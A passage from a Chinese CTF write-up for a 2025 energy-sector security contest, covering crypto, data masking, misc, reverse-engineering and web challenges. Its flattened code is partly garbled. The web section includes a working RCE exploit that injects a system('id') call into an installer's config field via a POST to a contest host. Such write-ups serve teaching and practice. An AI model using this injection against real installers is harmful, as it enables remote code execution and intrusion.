fb753084cb7c1deee139f6e158a0228bbf9b0ae5ed3a8b3d2508ce62e4e32cd43a3135540b31e052e6e3a0dba3ae623c69d74da34387c3429b6f0487,0xbff5ab718c54909a34ba8ab5787cbfb0c9c57394350b71744d5751f577cefda87cc8263b21dd2c21a8f19fff8362c3371fcb054dddb1293df7d6efe2d661e4ab,0xb946ad47cf1f9186c1eeaeed12f21b41a29f9fb74b14f577c97731004b372c5f41023aafc9b93557c984ff87dd263b293aa500c3a2ce1f0815319263cf7c42d5,0x9b93853dc5f4c052fdda339f69c625bc98ffdbde439078458b84278e34542f9110863e5beef166a766f565f7a815ec4a462510b42f81454b65e648622c610b27,0xae050aaa86b9580747efa33561973597d7d7a0684a45219eed3224ebc37fdf067ed61a29ecaa501266c9bcdd16b850c0dd40da3f964a5b03ae60c3967fd55913,0xea57b0482a876d49a3e21bb885bda0aae21f5fcf2521f7e1db771998b6b639d0833c17d7c8c67c12ce9b60e4210e068f98344a8cabc5faa17a048100bab797bb,0x9f866ad27c9ea2fb29168ec6db0f7755221484d0c89bfef0cd70fc2ed14fda15f7b59bbca2e23f40b5effeb9e53ad821e06cf986b34da4407c85bfbf78d2920b,0xab0939605dcff5d1ec8405b6daeb65eccc6e3b5956601dddea95c6310ac32bfeec1bab6b83e85371078a16ea9489050175098d39488aaed2a190c647fe2b1b69,0xe85698e04d8bedbac2c7884c914b7026dbb1dd5134c4a5a8e7541b07c8a94ab3d2f12eb7f1171ccd564054e1dc63d5ac044e5c5552870b419fef35a572199239,0xea94663e103e4354fb7feb80b11d06c7e16feb7265f69ee882180baba70fa075df24e3fe1ad12a99f054cabf4a3f5e4823416d4c4daa02ca51ce3926034186db,0x93662718294005f4ac8f79b0799e240a05eea871ef07d623ea7c68ef818b3b55fb4f9b6f06c399726e59cec03389053b448f187404cddb93cb3c55e3d12cebc9]cs =[0x4aae29aaaab89fbc672db400c41d1ad3ffce937e7810065bed552c12101fb778046d22b00c05bbc3f61825b5af3c3e57f1abaafe3d9a58a573a905e2a1cecde7,0x502a1c23ef44f174aaedb9a49705eb72f805bab13e82d599525ea7484cc11f2e7c4475526b4be344390e46bcb8bcdaba2768c6321f8ca5482666171eee498f28,0x546f2276b59b7186ef5b9a04e0ba2691648d005fc780303411a1082ea3b05be127a10e26921a4b84b14d8acc45a6c32a0142ac6eb396415ecb5841a01b775b5d,0x43986eb7208b66dd86c12f953e10b2d3907873151170278393b6a4f7ea518ab5745e2db5f4dbec84087c4817c5df10e743f35ed1190515aba34832b1b274bf2e,0x7b2e448342bc7409ed891cdbf5137014f417866097297302085d8800458495e374fba8398d069f1c1c7792a9f03194e36921c378308de18313fb9b62db45cc0a,0x41ac8f265bc96ae868256fb08caf0a43a547346522b5d90cb9489c87cd5d726447d20354332dd3cb771003eddfa9c4bfa6923ae45ac8c0994f7cce46a3302eea,0x51b59ad39b388fdb2056279e2de02d32d36b52da1cc1fe4f6843964273b4585704e21405e2528e5894bd4fdb436c382a5f7d3849f9c5d7902be74edd2b16a31c,0x4e52d207f16a6f42497b25600e039de3ce49d7945ac2201ac12bf9fa9b3dc136f35328cbe9d3f9d4204d90f29fe1ce209c8904c99de0f85c5c572d05609095a6,0x6485f505cd8296e9f1c9abdc39eebc6e767e98e1587b18878fa8a582a012bb609c2f36daffc2b9c460514bc47533525ce6835e7f8123331a833958fa47f2e40,0x1ff809e71ab0347a8a9ec4356d5b8fbf109ade5881e5b59ac14adaaef2034fc40880e495070442513f42434fa8cbfcd9bce0501574997b35939f201ba1c87872,0x5b3fad73b402fcc1148758d80a61f637257d35f2773c8dc9f22859a01aecaa37a37858232ab5b3e3622f234bf35bb02a6e93ecd5a06182b61e583d0193afaf55,0x640e3556a526209f8528fbe678da3914d912a7e701abc3d4fcd65d84bcdbfc22623dfa3db31f9585a615c6de869b39c040dbfe94bb7eafd91bde15c4b87bd2c0,0x335b0ff42f39541539752faade7510a301a861720d85958ce2890ddca9e0693b342604a5b134a0974ea21dc0dc0a156c01159898e5f87e16b4a56121c2e3bbb5,0x89621740ec8b81065457105685666dfe6e31ee4f0a6efa6901e20ad6e5ea19ba438ea92f632764e52ccfb1ed35639443b5536f19ca69e9c295c6f5287a5e31b,0x1e4162060327045be0f5a0ae5d7b87c60b928e4669450339af64a39ae45b108eb58bbe83e15bef7a5c92243b213adc3e9d3514632249314bf5b588df6202ae10,0x5d10e308a16f8cd5c53b3ecd1081624e6eed4c3bfe522a8b7daf301aa6fc370b0a1cff1db7ea27aa6f5200903b365c53bc6d890ca1167ca57de87f80c5321742,0x434ac82b1ed073a1d73606ffe973e316768368fb522644f6cc76d2a0e6b83f533524c7589113aeb2db35d50c2f9ff64ceb27958a93d47b6875b8eb9b158ebaac,0x7cf3028273ece2a8af9790d3a689875bf7a3894e351a639d88fa13de05dc7f18be20ddeef4414a31b0f3dd65291e5d4d47d098027dbec25d4bc5409c017f0b03,0x5d0eefe7de32360d7950d96d821ce06741b737a1dca016cb003f75e380f5c8e3d9b8505b0eda21b36879a6455d1f640bdac5ad648b97d80eacf406b57bb1d692,0x4e4c6156da7f71123e1b4efde4a436985c6f2cccdc9b182735a75153927c6e7dc94693ab7fdd8646821a9d42eeb76c1be54984f81296a10e689805975185bf2c,0x68db6b837d968569ba944591efb36587f0022b05cefbedaad1e1d7652d0c233d1c0b036364f25e0865c7a1dab8d9d1081f23928a3573b5ec711e5b7f32714a4,0x333db46bc5fb83cbbf68475fd612bcad6becd30f95bf5b9ab6058ed0777fcb78cfe6da5c3386799fe9a1d6616801154ae7f45e35612de08efed7e2e750088b8e,0x70d4dc8986c228e12329af934c08f7c0ca94ce6913b5c641c59b3cf629a1957f82d4f40aaa7faa765c75e4f994a8222a4d08e045fb529da5ee277e1b9540c148,0x20421569b3bc73da4505760f7798a504f2276e6df9c9e48320b23201fb682021d168f6ee657fc2080722eb576ac78bf4b63ad7419983a05196fa0724fc4886d,0x5f523df584f43d7eff229d562793c8e5d4713d9c80bd40b95434c34c982324f7c282ac2fe3ac151cb62435b85bece2ef115c6f4b7a33d47dcbfa8360f89b91ac,0x7cbedea149640064a93cb75b909804ee7a896e17da808579206d1db7523b98bdf15bdc70e267e0a201bf293f980c1b5304337a7a78cc655aca07b9818b7169ab,0x62b34eaac3d3a2b360805cc23147ff8754a9d90788461107a5c8cc7053a0910ca7af45035d333c9a0b7cf6a2c13c9c367ad8eea0ccda2a6d8e089b5ee07a76ef,0x3e1c31f988e238869fad4794beb32164fa3bf3880041d1f9f2a65e2679f951491fcbeff1aa067313bf02100ae15d1af4d87050db05cec934e077c3eec238b72,0x3c056ad33432e1cf5548ae3a6db21ee1471eb70619e0ad542bd38dd80f37b76b571ae6469bacd33f9618b7a61b8e8424fc33cae479375df72b064a5d1b8cd90f,0x4caf081f5b949e65115e18b613ad8dc1fc208d2c5bea710b27b1db11d4a7eecc455c13f2fd92481f8cfea3e6fa75c0a58a154f12b6ce92c66107f617fd7ed7d8]enc=0x191eb43459bd0f2d5ece00ab52c612668bb4c161014641a6e4afb41020465d7b82e9b60a55ab831bb5695f2fd832d08258c752ebf27ba0374b7b11b001b2629at = len(rs)kbits = 400K = 2 ** kbitsP = identity_matrix(t) * pRC = matrix([[-10], [01]]) * matrix([rs, cs])KP = matrix([[K / p, 0], [0, K]])M = block_matrix([[P, 0], [RC, KP]], subdivide=False)shortest_vector = M.LLL()x = shortest_vector[1-2] / K * p % pprint(x)G=GF(p)factors, exps = zip(*factor(p - 1))primes = [factors[i] ^ exps[i] for i in range(len(factors))]print(primes)dlogs = []for fac in primes[:-1]:    t = (p - 1) // fac    dlog = discrete_log(G(pow(enc, t, p)), G(pow(x, t, p)))    dlogs += [dlog]s = (p - 1) // primes[-1]print(s)res = crt(dlogs, primes[:-1])for i in range(100):if b'flag{'in long_to_bytes(res + i * s):        print(long_to_bytes(res + i * s))break
2025年能源网络安全大赛团体预赛社会组Write up
二、数据安全
(一)

结构化数据识别

2025年能源网络安全大赛团体预赛社会组Write up
使用AI生成几个对对应的验证函数并提取每一行来判断同时满足4个条件的数据即可,最后的数据进行md5处理。
import refrom datetime import datetimeimport hashlibimport pandas as pddefis_sfz(id_number):if not isinstance(id_number, str) or len(id_number) != 18:return Falseif not re.match(r"^d{17}[dXx]$", id_number):return Falseif not id_number[:6].isdigit():return Falsetry:        birth_date = datetime.strptime(id_number[6:14], "%Y%m%d")if birth_date > datetime.now():return Falseif birth_date.year < datetime.now().year - 150:return Falseexcept ValueError:return False    weights = [7910584216379105842]    check_codes = ['1''0''X''9''8''7''6''5''4''3''2']    total = 0for i in range(17):        total += int(id_number[i]) * weights[i]    calculated_check_code = check_codes[total % 11]if id_number[-1].upper() != calculated_check_code:return Falsereturn Truedefis_phone_number(phone_number):if not isinstance(phone_number, str) or len(phone_number) != 11:return Falseif not phone_number.isdigit():return Falseif phone_number[0] != '1'or not ('3' <= phone_number[1] <= '9'):return Falsereturn Truedefis_email(email):if not isinstance(email, str) or not email or len(email) > 254:return False# 正则表达式匹配RFC 5322标准的基本邮箱格式    pattern = r"""        ^                           # 开始        [a-zA-Z0-9]                # 必须以字母数字开头        [a-zA-Z0-9._%+-]{0,63}     # 中间字符(最多64字符)        @                           # @符号        [a-zA-Z0-9.-]{1,63}        # 域名部分        .                          # 最后一个点        [a-zA-Z]{2,}               # 顶级域名(至少2字符)        $                           # 结束    """    email_regex = re.compile(pattern, re.VERBOSE)if not email_regex.match(email):return Falseif".."in email or"--"in email:return False    local_part, domain = email.split('@'1)if len(local_part) > 64:return Falseif len(domain) > 253:return False    domain_parts = domain.split('.')for part in domain_parts:if not part or part.startswith('-'or part.endswith('-'):return Falsereturn Truedefis_yhk(card_number):    card_number = ''.join(filter(str.isdigit, str(card_number)))if len(card_number) < 13 or len(card_number) > 19:return False    total = 0    reverse_digits = card_number[::-1]for i, digit in enumerate(reverse_digits):        num = int(digit)if i % 2 == 1:            num *= 2if num > 9:                num = (num // 10) + (num % 10)        total += numreturn total % 10 == 0defis_ok(sfz, phone, email, yhk):if is_sfz(sfz) and is_phone_number(phone) and is_email(email) and is_yhk(yhk):return Truecount = 0excel_obj = pd.read_excel("data.xlsx")data = excel_obj.iloc[:, 0:4].values.tolist()for one in data:if is_ok(one[0], one[1], one[2], one[3]):        count += 1print(hashlib.md5(str(count).encode('utf-8')).hexdigest())'''082a8bbf2c357c09f26675f9cf5bcba3'''
(二)

数据脱敏

2025年能源网络安全大赛团体预赛社会组Write up
处理规则:
  • 身份证:前6位+** 
  • 手机号:前3后3中间* 
  • 邮箱:@前除.外全* 
  • 银行卡:前4后10中间* 
  • 姓名:2字首+* / 3字首尾+* / 4字首尾+** 
  • 性别→未知 
  • 微信号:全* 
import pandas as pdfrom hashlib import md5 as hasherPROCESSORS = [#身份证号脱敏    ('身份证号'lambda x: x[:6] + '*'*(len(x)-6)),    ('Email'lambda e: ''.join('*'if c != '.'else'.'for c in e.split('@')[0]) + '@' + e.split('@')[1]),    ('手机号'lambda p: f"{str(p)[:3]}*****{str(p)[-3:]}"),    ('性别'lambda _: "未知"),    ('银行卡号'lambda c: str(c)[:4] + '*'*(len(str(c))-14) + str(c)[-10:]),    ('姓名'lambda n: (        n[0]+'*'*(len(n)-1if len(n)==2else        n[0]+'*'+n[2if len(n)==3else        n[0]+'**'+n[3if len(n)==4else n    )),    ('微信号'lambda w: '*'*len(w))]raw_data = pd.read_excel('data.xlsx')modified = raw_data.copy()for column, processor in PROCESSORS:    modified[column] = modified[column].apply(processor)FIELD_ORDER = ['姓名''手机号''身份证号''银行卡号''Email''性别''微信号']concat_parts = []for _, row in modified[FIELD_ORDER].iterrows():    row_str = ''for field in FIELD_ORDER:        row_str += str(row[field])    concat_parts.append(row_str)full_string = ''.join(concat_parts)# 计算md5digest = hasher(full_string.encode('utf-8')).hexdigest()print(digest)
最终得到flag:b54cc7298aaaae763d605cf87bcd714a
2025年能源网络安全大赛团体预赛社会组Write up
三、misc
(一)

black_white

2025年能源网络安全大赛团体预赛社会组Write up
观察图片后面部分,有一个倒序的图片,将其提取出来再写个脚本还原。
2025年能源网络安全大赛团体预赛社会组Write up
source_file = open("tmp.png""rb")try:    image_content = source_file.read()    reversed_content = image_content[::-1]    output_file = open("result.png""wb")try:        output_file.write(reversed_content)finally:        output_file.close()finally:     source_file.close()
2025年能源网络安全大赛团体预赛社会组Write up
针对两张图像开展处理,对其像素进行黑白二值化转换,以数值1表征黑色像素,数值0表征白色像素。在对多种像素运算方法进行试验和分析后,发现异或(XOR)运算能够有效提取出特定zip文件。
from PIL import Imagedefopen_image(image_path):"""    打开指定路径的图片    :param image_path: 图片的文件路径    :return: 打开的图片对象    """try:return Image.open(image_path)except FileNotFoundError:        print(f"错误:未找到图片文件 {image_path}")return Nonedefprint_image_dimensions(image):"""    打印图片的宽度和高度    :param image: 图片对象    """if image:        width, height = image.size        print(f"图片宽度: {width}, 图片高度: {height}")defconvert_image_to_binary(image):"""    将图片转换为二进制字符串,白色像素用 '0' 表示,黑色像素用 '1' 表示    :param image: 图片对象    :return: 二进制字符串    """    binary_string = ""if image:        width, height = image.sizefor y in range(height):for x in range(width):                pixel = image.getpixel((x, y))if pixel == 255:                    binary_string += '0'elif pixel == 0:                    binary_string += '1'else:                    print(f"发现非黑白像素值: {pixel}")return binary_stringdefbinary_string_to_int(binary_str):"""    将二进制字符串转换为整数    :param binary_str: 二进制字符串    :return: 对应的整数    """return int(binary_str, 2if binary_str else0defwrite_bytes_to_file(byte_data, file_path):"""    将字节数据写入指定文件    :param byte_data: 字节数据    :param file_path: 文件路径    """try:with open(file_path, 'wb'as file:            file.write(byte_data)        print(f"数据已成功写入 {file_path}")except Exception as e:        print(f"写入文件时出错: {e}")# 打开两张图片image_one = open_image("black_white.png")image_two = open_image("result.png")# 打印图片尺寸print_image_dimensions(image_one)print_image_dimensions(image_two)# 将图片转换为二进制字符串并转换为整数binary_int_one = binary_string_to_int(convert_image_to_binary(image_one))binary_int_two = binary_string_to_int(convert_image_to_binary(image_two))# 打印转换后的字节数据print(binary_int_one.to_bytes(900'big'))print(binary_int_two.to_bytes(900'big'))# 执行异或运算xor_result = binary_int_one ^ binary_int_two# 打印异或结果的字节数据print(xor_result.to_bytes(900'big'))# 将异或结果写入文件write_bytes_to_file(xor_result.to_bytes(900'big'), "out1.zip")
根据上面代码,得到一个zip压缩包,解压后,得到一个flag名文件,修改16进制前2位为424D,后缀修改为bmp,可得到一个类似汉信码图片,将其放在左下角在ps上修改一下,可得下面图片。
2025年能源网络安全大赛团体预赛社会组Write up
找个在线网站识别,可得flag:
2025年能源网络安全大赛团体预赛社会组Write up
(二)

knn

2025年能源网络安全大赛团体预赛社会组Write up
根据题目描述KNN,使用KNN分类模型进行预测。
使用Python机器学习模块 - sklearn - 对数据结果进行分类;
经过测试,发现需要对A车、B车要转换为二进制0和1再进行ascii解码。
import pandas as pdfrom sklearn.neighbors import KNeighborsClassifierfrom sklearn.model_selection import train_test_splitfrom sklearn.metrics import accuracy_score# 加载历史评分数据,指定编码为GBKhistory_data = pd.read_csv('新能源汽车检测数据.csv', encoding='GBK')# 读取待检测新能源车数据test_data = pd.read_csv('待检测新能源车.csv', encoding='GBK')# 提取特征和目标变量X = history_data[['防碰撞评分''电池容量评分''智能驾驶能力''智能座舱评分']]y = history_data['名称']# 划分训练集和测试集X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)# 创建KNN分类器,这里假设K取5,可根据实际情况调整knn = KNeighborsClassifier(n_neighbors=10)# 在训练集上训练模型knn.fit(X_train, y_train)# 在测试集上进行预测y_pred = knn.predict(X_test)# 计算模型的准确率accuracy = accuracy_score(y_test, y_pred)print(f'模型准确率: {accuracy}')# 提取待检测新能源车数据的特征test_X = test_data[['防碰撞评分''电池容量评分''智能驾驶能力''智能座舱评分']]# 使用训练好的模型进行预测test_pred = knn.predict(test_X)# 将预测结果添加到待检测新能源车数据中test_data['预测车型'] = test_pred# 将结果保存为csv文件csv_path = '待检测新能源车_预测结果.csv'test_data.to_csv(csv_path, index=False, encoding='utf-8')df = pd.read_csv(csv_path, encoding='utf-8')# 将预测车型列中的A车替换为0,B车替换为1df['预测车型'] = df['预测车型'].map({'A车''0''B车''1'})# 将预测车型列的所有值连接成一个字符串binary_string = ''.join(df['预测车型'])# 按每8位一组分割二进制字符串binary_chunks = [binary_string[i:i + 8for i in range(0, len(binary_string), 8)]# 将每个8位二进制字符串转换为ASCII字符ascii_string = ''.join([chr(int(chunk, 2)) for chunk in binary_chunks])# 输出结果print('转换后的ASCII码字符串为:', ascii_string)
结果如下:
2025年能源网络安全大赛团体预赛社会组Write up
发现结果中有一个为`字符,需要对模型进行微调及对KNeighborsClassifier进行修改,修改n_neighbors=200。
2025年能源网络安全大赛团体预赛社会组Write up
整合两数据内容,进行提交,发现最终结果为e0f095bd-16e6-4bf5-a1c5-3dce1d693aa5,因此有:flag{e0f095bd-16e6-4bf5-a1c5-3dce1d693aa5}。
2025年能源网络安全大赛团体预赛社会组Write up
四、web
(一)

这网页怪怪的

2025年能源网络安全大赛团体预赛社会组Write up
302跳转,burp抓包,然后提示访问yunnuuu.php,存在若类型和文件包含漏洞,文件包含flag文件。
2025年能源网络安全大赛团体预赛社会组Write up
base64解码即可得flag。
(二)

EasyIntall

2025年能源网络安全大赛团体预赛社会组Write up
审计代码,发现危险函数不多,找到一个文件写入点:
2025年能源网络安全大赛团体预赛社会组Write up
找调用这个函数的地方,发现只有一个调用,在安装的第三个步骤中。
2025年能源网络安全大赛团体预赛社会组Write up
参数是从cookie中取出来再传进去的因此可控,但是不知道数据格式。找到第二步中有所体现。
2025年能源网络安全大赛团体预赛社会组Write up
因此向step2提交相关信息就能获取到cookie,直接在任意位置进行代码注入即可,找到配置文件模板如下:
<?phpreturnarray('DB_TYPE'   => '[DB_TYPE]'// 数据库类型'DB_HOST'   => '[DB_HOST]'// 服务器地址'DB_NAME'   => '[DB_NAME]'// 数据库名'DB_USER'   => '[DB_USER]'// 用户名'DB_PWD'    => '[DB_PWD]',  // 密码'DB_PORT'   => '[DB_PORT]'// 端口'DB_PREFIX' => '[DB_PREFIX]'// 数据库表前缀);?>
在服务器地址处进行代码注入,通过访问返回的php文件位置完成RCE,exp:
import requestsurl = "http://115.29.176.197:23303/install.php?s=/install/step2.html"data = "db[]=mysqli&db[]=xxx'.system('id').'&db[]=dbname&db[]=root&db[]=123456aA.&db[]=3306&db[]=test_&admin[]=admin&admin[]=123&admin[]=test12&admin[]=test12&admin[][email protected]"print(requests.post(url, data=data, headers={"Content-Type""application/x-www-form-urlencoded"}).text)
2025年能源网络安全大赛团体预赛社会组Write up
五、能源行业
(一)

usb

2025年能源网络安全大赛团体预赛社会组Write up
提取数据:
2025年能源网络安全大赛团体预赛社会组Write up
2025年能源网络安全大赛团体预赛社会组Write up
# USB HID 键盘扫描码到字符的映射KEYCODE_MAP = {0x04'a'0x05'b'0x06'c'0x07'd'0x08'e'0x09'f'0x0A'g'0x0B'h',0x0C'i'0x0D'j'0x0E'k'0x0F'l'0x10:'m'0x11'n'0x12'o'0x13'p',0x14'q'0x15'r'0x16:'s'0x17't'0x18'u'0x19'v'0x1A'w'0x1B'x',0x1C'y'0x1D'z'0x1E'1'0x1F'2'0x20'3'0x21'4'0x22'5'0x23'6',0x24'7'0x25'8'0x26'9'0x27'0'0x28'n'0x29'Escape'0x2A'Backspace',0x2B'Tab'0x2C:' '0x2D'-'0x2E'='0x2F'['0x30']'0x31'\'0x32';',0x33'''0x34'`'0x35','0x36'.'0x37'/'0x38'Caps Lock'0x39'F1',0x3A'F2'0x3B'F3'0x3C'F4'0x3D'F5'0x3E'F6'0x3F'F7'0x40'F8',0x41'F9'0x42'F10'0x43'F11'0x44'F12'0x45'Print Screen'0x46'Scroll Lock',0x47'Pause'0x48'Insert'0x49'Home'0x4A'Page Up'0x4B'Delete'0x4C'End',0x4D'Page Down'0x4E'Right Arrow'0x4F'Left Arrow'0x50'Down Arrow'0x51'Up Arrow',0x52'Num Lock'0x53'Keypad /'0x54'Keypad *'0x55'Keypad -'0x56'Keypad +',0x57'Keypad Enter'0x58'Keypad 1'0x59'Keypad 2'0x5A'Keypad 3'0x5B'Keypad 4',0x5C'Keypad 5'0x5D'Keypad 6'0x5E'Keypad 7'0x5F'Keypad 8'0x60'Keypad 9',0x61'Keypad 0'0x62'Keypad .'0x63'Non-US # and ~'0x64'Application'0x65'Power',0x66'Keypad ='0x67'F13'0x68'F14'0x69'F15'0x6A'F16'0x6B'F17'0x6C'F18',0x6D'F19'0x6E'F20'0x6F'F21'0x70'F22'0x71'F23'0x72'F24'0x73'Execute',0x74'Help'0x75'Menu'0x76'Select'0x77'Stop'0x78'Again'0x79'Undo',0x7A'Cut'0x7B'Copy'0x7C'Paste'0x7D'Find'0x7E'Mute'0x7F'Volume Up',0x80'Volume Down'}defdecode_usb_keyboard_data(data):"""    解码 USB 键盘数据    :param data: 十六进制字符串形式的 USB 键盘数据    :return: 解码后的按键信息列表    """try:# 将十六进制字符串转换为字节        bytes_data = bytes.fromhex(data.replace(" """))        keys = []# 从第 2 个字节开始解析按键信息for i in range(2, len(bytes_data)):            keycode = bytes_data[i]if keycode in KEYCODE_MAP:                keys.append(KEYCODE_MAP[keycode])return keysexcept ValueError:        print("输入的不是有效的十六进制字符串")return []if __name__ == "__main__":try:with open('out.txt''r'as file:for line in file:                line = line.strip()                decoded_keys = decode_usb_keyboard_data(line)                print(f"解码行数据 '{line}' 的按键信息:", decoded_keys)except FileNotFoundError:        print("文件 out.txt 不存在")
2025年能源网络安全大赛团体预赛社会组Write up
2025年能源网络安全大赛团体预赛社会组Write up
(二)

Lava

2025年能源网络安全大赛团体预赛社会组Write up
Strings 能看到 3.95 的魔改upx加固:
2025年能源网络安全大赛团体预赛社会组Write up
先010看看特征,发现以下位置被修改:
2025年能源网络安全大赛团体预赛社会组Write up
改完保存为lavatk,再找3.95的upx就能脱壳了。
2025年能源网络安全大赛团体预赛社会组Write up
核心逻辑如下:
RC4算法的特征看下图。
2025年能源网络安全大赛团体预赛社会组Write up
算法有魔改,因此找个C语言RC4板子,稍许修改以下内容。
2025年能源网络安全大赛团体预赛社会组Write up
2025年能源网络安全大赛团体预赛社会组Write up
#include<stdio.h>unsigned char S_Box[256] = { 0 };// RC4 initialvoidInit(unsignedchar* key, int keyLen){unsigned char T[256] = { 0 };for (int i = 0; i < 256; i++) {        S_Box[i] = i;        T[i] = key[i % keyLen];    }int j = 0;for (int i = 0; i < 256; i++) {        j = (j + S_Box[i] + T[i]) % 256;unsigned char tmp = S_Box[i];        S_Box[i] += S_Box[j];        S_Box[j] += tmp;    }return;}// RC4 Encryption and Decryption (The same)voidRC4(unsignedchar* key, int keyLen, unsignedchar* data, int dataLen){    Init(key, keyLen);int i = 0, j = 0;for (int k = 0; k < dataLen; k++) {        i = (i + 1) % 256;        j = (j + S_Box[i]) % 256;unsigned char tmp = S_Box[i];        S_Box[i] = S_Box[j];        S_Box[j] = tmp;        data[k] += S_Box[(S_Box[i] + S_Box[j]) % 256];    }}// Hex to Charconst char HexChar[16] = { '0''1''2''3''4''5''6''7''8''9''a''b''c''d''e''f' };voidhex2char(unsignedchar* hex, unsignedchar* chr, int hexLen){int lastIdx = 0;for (int i = 0; i < hexLen; i++) {int index = 0;for (index = 0; index < 16; index++) {if (HexChar[index] == hex[i]) {break;            }        }if (index == 16) {printf("Please check your hex string at POSITION [%d] again.n", i);return;        }if (i & 1) chr[i / 2] = lastIdx * 16 + index;else lastIdx = index;    }return;}intmain(){unsigned char key_hex[] = "726334497345617379";unsigned char data_hex[] = "643ad079b9e975526ee9fb0e52241cb62be486f86952533e3c8eb01662e6987f";int keyLen = 9, dataLen = 32;unsigned char key[10] = { 0 };unsigned char data[33] = { 0 };    hex2char(key_hex, key, keyLen * 2);    hex2char(data_hex, data, dataLen * 2);    RC4(key, keyLen, data, dataLen);printf("n[*]RC4 Encrypt/Decrypt result: ");printf("n%s",data);return 0;}
测试结果如下:
2025年能源网络安全大赛团体预赛社会组Write up
2025年能源网络安全大赛团体预赛社会组Write up
从而,得到flag{2404c9b8af2dd18f92dd9018c85f76fe}。
2025年能源网络安全大赛团体预赛社会组Write up
山石网科是中国网络安全行业的技术创新领导厂商,由一批知名网络安全技术骨干于2007年创立,并以首批网络安全企业的身份,于2019年9月登陆科创板(股票简称:山石网科,股票代码:688030)。
现阶段,山石网科掌握30项自主研发核心技术,申请560多项国内外专利。山石网科于2019年起,积极布局信创领域,致力于推动国内信息技术创新,并于2021年正式启动安全芯片战略。2023年进行自研ASIC安全芯片的技术研发,旨在通过自主创新,为用户提供更高效、更安全的网络安全保障。目前,山石网科已形成了具备“全息、量化、智能、协同”四大技术特点的涉及基础设施安全、云安全、数据安全、应用安全、安全运营、工业互联网安全、信息技术应用创新、安全服务、安全教育等九大类产品服务,50余个行业和场景的完整解决方案。
2025年能源网络安全大赛团体预赛社会组Write up

原文始发于微信公众号(山石网科安全技术研究院):2025年能源网络安全大赛团体预赛社会组Write up

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月23日17:56:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2025年能源网络安全大赛团体预赛社会组Write uphttps://cn-sec.com/archives/3990683.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息